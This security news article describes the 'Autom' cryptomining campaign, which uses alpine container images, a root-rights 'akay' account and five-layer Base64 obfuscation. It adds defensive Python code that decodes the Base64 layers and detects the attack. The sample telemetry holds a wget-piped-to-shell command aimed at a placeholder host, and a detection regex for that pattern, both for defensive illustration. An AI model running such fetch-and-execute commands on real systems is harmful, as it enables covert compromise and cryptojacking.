Cryptomining Malware Uses New Techniques To Hide The Attack & Bypass Security

Security analysts from Team Nautilus at Aqua Security have recently caught an ongoing malicious cryptomining campaign that has been upgraded to the next level, evolving new TTPs in its:-

  • Defense mechanisms
  • Evasion tactics
  • Tools
  • Methods

This cryptomining malware has been named “Autom,” and the analysts speculate that, as the campaign has evolved, it has adopted several malicious tactics to hide the attack and evade the checks of security solutions.

Autom campaign and its evolution

A total of 84 attacks against its honeypot servers have been recorded since the campaign was first spotted in 2019, and four of those attacks occurred in 2021. In the third quarter of 2021 alone, after the campaign had evolved, the attackers launched more than 125 attacks in the wild.

The campaign has been named “Autom” only because of the shell script it uses, and during this time period the threat actors have changed and evolved all of their tactics.

When this malicious cryptomining campaign was first spotted in 2019, the attack command was executed while running a vanilla alpine:latest image, which caused a shell script to be downloaded.

Here’s what the security analysts stated:-

“Adversaries commonly use vanilla images along with malicious commands to perform their attacks, because most organizations trust the official images and allow their use.”

After the shell script has been downloaded, the malware begins the attack sequence. In this sequence the threat actors create a new user account under the name “akay” with root user rights.

At this stage, the attacker abuses the root privileges to execute arbitrary commands on the compromised system to mine cryptocurrency. To get around security tools, the malware retrieves a mining shell script that has been Base64-encoded five times as obfuscation.
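The multi-layer Base64 wrapping described above is cheap for an attacker and trivial to undo for an analyst, as long as the unwrapping stops at the right layer. The following helper is an added example written for this article, not code from Aqua's report or from the campaign: it builds a harmless placeholder script (constructed, not the real miner), wraps it in five Base64 layers the way the text describes, and then peels the layers back off, stopping as soon as a decoded layer is no longer Base64 text or would turn into non-text bytes. The bound on the number of layers is an assumption chosen so that malformed input cannot keep the loop spinning.

```python
import base64
import binascii
import re
from typing import Tuple

# Constructed sample: a harmless placeholder standing in for the miner
# script the article describes. It is NOT the campaign's real payload.
_INNER_SCRIPT = b"#!/bin/sh\necho 'placeholder script for analysis'\n"


def wrap_base64(data: bytes, layers: int) -> bytes:
    """Apply base64 encoding `layers` times (used only to build the sample)."""
    for _ in range(layers):
        data = base64.b64encode(data)
    return data


# Five layers, matching the "encoded five times" behaviour described above.
SAMPLE_BLOB = wrap_base64(_INNER_SCRIPT, 5)

# Base64 alphabet plus padding; whitespace is removed before this is applied.
_B64_RE = re.compile(rb"^[A-Za-z0-9+/]+={0,2}$")


def _looks_like_base64(data: bytes) -> bool:
    return len(data) % 4 == 0 and _B64_RE.match(data) is not None


def _is_text(data: bytes) -> bool:
    """Shell scripts are text: reject layers that decode to binary garbage."""
    try:
        text = data.decode("utf-8")
    except UnicodeDecodeError:
        return False
    return all(ch.isprintable() or ch in "\n\r\t" for ch in text)


def peel_base64(blob: bytes, max_layers: int = 16) -> Tuple[int, bytes]:
    """Strip nested base64 layers and return (layers_removed, innermost_bytes).

    Stops when the current data is not base64-shaped, fails strict decoding,
    or would decode to non-text; max_layers (an assumed bound) prevents a
    pathological input from looping indefinitely.
    """
    current = blob
    layers = 0
    while layers < max_layers:
        compact = re.sub(rb"\s+", b"", current)
        if not compact or not _looks_like_base64(compact):
            break
        try:
            decoded = base64.b64decode(compact, validate=True)
        except (binascii.Error, ValueError):
            break
        if not decoded or not _is_text(decoded):
            break
        current = decoded
        layers += 1
    return layers, current


if __name__ == "__main__":
    depth, script = peel_base64(SAMPLE_BLOB)
    print(f"removed {depth} base64 layer(s)")
    print(script.decode())
```

The depth returned is itself a useful signal: a script that only becomes readable after several decoding passes is worth a closer look during dynamic image analysis even before anyone reads its contents.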

The founder and CTO of Bugcrowd, Casey Ellis stated:-

“Evading detection for as long as possible to maximize their time on target and potential for a return has become a core part of an attacker’s job.”

To mitigate this, the experts have offered the following recommendations:-

  • Perform dynamic image analysis
  • Monitor container activity
  • Check your environment for misconfigured APIs
  • Limit unsecured inbound or outbound communication

These are the four key mitigation points that users should follow to stay safe against such malicious campaigns.
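The behaviours the article describes (a trusted base image launched with a command that fetches and runs a remote script, a second account holding root rights, and unsanctioned outbound traffic) map directly onto the "monitor container activity" and "limit unsecured communication" recommendations. The code below is an added example written for this article, not tooling from Aqua Security: it runs three simple detection rules over a small set of constructed container telemetry records. The event shape, the container names, the placeholder host `placeholder.invalid`, the IP addresses and the egress allowlist are all assumptions chosen for the example; none of them are indicators from the campaign.

```python
import ipaddress
import re
from typing import Dict, List, Tuple

# Constructed sample telemetry, loosely shaped like container runtime events.
# Names, hosts and addresses are placeholders, not campaign indicators.
SAMPLE_EVENTS: List[Dict] = [
    {"type": "container_start", "container": "c1", "image": "alpine:latest",
     "cmd": "sh -c 'wget -q -O - http://placeholder.invalid/a.sh | sh'"},
    {"type": "passwd_snapshot", "container": "c1",
     "entries": ["root:x:0:0:root:/root:/bin/ash",
                 "akay:x:0:0::/home/akay:/bin/ash"]},
    {"type": "net_connect", "container": "c1", "dst": "203.0.113.10:4444"},
    # A benign container for contrast: same image, harmless command,
    # account list untouched, egress stays inside the allowed range.
    {"type": "container_start", "container": "c2", "image": "alpine:latest",
     "cmd": "sh -c 'echo hello'"},
    {"type": "passwd_snapshot", "container": "c2",
     "entries": ["root:x:0:0:root:/root:/bin/ash"]},
    {"type": "net_connect", "container": "c2", "dst": "10.0.0.5:443"},
]

# Assumed egress policy: only the internal range is approved.
ALLOWED_EGRESS = [ipaddress.ip_network("10.0.0.0/8")]

# Download tool piped straight into a shell: the "fetch and run a script"
# pattern the article attributes to the initial attack command.
REMOTE_SCRIPT_RE = re.compile(r"\b(curl|wget)\b[^|]*\|\s*(ba|a)?sh\b")

Alert = Tuple[str, str, str]  # (container, rule, detail)


def check_start(ev: Dict) -> List[Alert]:
    """Flag a container whose launch command fetches and executes a script."""
    if REMOTE_SCRIPT_RE.search(ev["cmd"]):
        return [(ev["container"], "remote_script_exec", ev["image"])]
    return []


def check_passwd(ev: Dict) -> List[Alert]:
    """Flag any account other than root whose UID is 0 (root rights)."""
    alerts = []
    for line in ev["entries"]:
        fields = line.split(":")
        if len(fields) >= 3 and fields[2] == "0" and fields[0] != "root":
            alerts.append((ev["container"], "extra_uid0_account", fields[0]))
    return alerts


def check_egress(ev: Dict) -> List[Alert]:
    """Flag outbound connections to destinations outside the allowlist."""
    host, _, _port = ev["dst"].rpartition(":")
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        # Unparseable destination: surface it rather than silently pass it.
        return [(ev["container"], "unapproved_egress", ev["dst"])]
    if not any(ip in net for net in ALLOWED_EGRESS):
        return [(ev["container"], "unapproved_egress", ev["dst"])]
    return []


_RULES = {
    "container_start": check_start,
    "passwd_snapshot": check_passwd,
    "net_connect": check_egress,
}


def analyze_events(events: List[Dict]) -> List[Alert]:
    """Run every applicable rule over the event stream and collect alerts."""
    alerts: List[Alert] = []
    for ev in events:
        rule = _RULES.get(ev.get("type"))
        if rule is not None:
            alerts.extend(rule(ev))
    return alerts


if __name__ == "__main__":
    for container, rule, detail in analyze_events(SAMPLE_EVENTS):
        print(f"{container}: {rule} ({detail})")
```

Each rule on its own is noisy in a real fleet (plenty of legitimate build steps pipe a download into a shell), so the value comes from correlating them per container: a container that trips all three in sequence, as `c1` does here, matches the chain the article lays out far more convincingly than any single hit.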


Balaji N

BALAJI is an Ex-Security Researcher (Threat Research Labs) at Comodo Cybersecurity. Editor-in-Chief & Co-Founder - Cyber Security News & GBHackers On Security.

